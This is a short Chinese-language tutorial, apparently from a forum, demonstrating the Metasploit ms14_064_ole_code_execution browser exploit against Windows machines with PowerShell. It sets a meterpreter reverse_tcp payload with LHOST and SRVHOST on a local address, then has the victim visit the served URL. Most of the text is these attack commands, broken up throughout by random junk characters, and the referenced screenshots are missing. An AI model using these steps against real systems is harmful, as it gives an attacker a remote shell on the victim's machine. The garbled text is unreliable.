4 y% o6 A* e: n5 b9 }2 r# U 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示4 h5 x$ t# s8 Q3 Z( r' M$ M
4 s& ~6 z1 ^3 @# a
& [0 O/ Z4 W. g2 H+ M6 ^
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 6 A- ]5 ~' s. {4 ^- X
* ]9 W# C" _. ]. Q3 D
& E6 J' J5 }) Q3 E8 t. o8 |
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp+ J% s x! o9 p% _
+ i' Z6 P2 J4 m9 N/ G. F* z' b- G7 Y3 A2 ~; s
set AllowPowershellPrompt true' w! b8 w6 ^. D: ~5 k! [
3 s3 b9 H9 Q/ b5 I5 j1 g
5 B" d' c: y/ x4 P Set LHOST 192.168.0.1097 w; r5 W6 l( \$ _5 v$ X! }; d
- S* o' e* A( Q) m) w3 W4 b) |" U9 l+ Q# j+ [
set SRVHOST 192.168.0.109
# p) J: } {6 d7 H- _" b+ {
/ ]5 l- W( Z* O: ~( A
3 x z' s; `8 I& l0 b Set uripath share3 f( Y: |' Q/ G, i* ?" P1 i
j: @( j) v$ @; e
% Q/ H. V- G* n/ U0 J Set srvport 80+ d3 J! C* x, t$ A' R1 m$ _
F" ]1 u. N! J% t2 s$ y% S. n
; T2 L) R8 D7 R
4 K# Z) a/ v8 _, G( N7 R( k
( ^; B( ^ G! t/ }9 c. E ]/ K ?# |7 I& f/ i7 \* u
9 C8 I) Y" Q3 n! p
' a' ?! D- s$ Q2 `: j' ?" p% v$ E
& N ^ q+ g+ u, U' t5 j! {1 f
/ c3 ?& a- b$ |; s; M
; W: d* W" @7 y; m
/ w7 _5 b) {/ V6 i. C( n$ o, [) w
1 y$ n! T- P2 n5 f
; j& z' {: g# G0 L2 I5 `
' F& Q2 `5 [$ Z! b E: i
) e8 T+ P" z% B1 }. ?: J8 H- `' k; R" Y/ h
下面我们来访问本地地址如图:
0 B. G, L0 D1 {& c- e7 g* c* x
$ ]( \$ h$ N! g) T0 d. r6 J
" V+ R6 d+ T5 H/ o; F/ E" c * Q+ H0 X1 a: y. U2 \' t
- u2 ?/ L( n! W P( S6 q7 _
! H8 f7 w# f l p( p 5 R. e2 |9 l) l
- d4 `* T2 S, ~
/ Y+ C, z% Y" g1 o6 m: d+ \1 }
, }# o; ^% Y! h4 K/ y- v3 i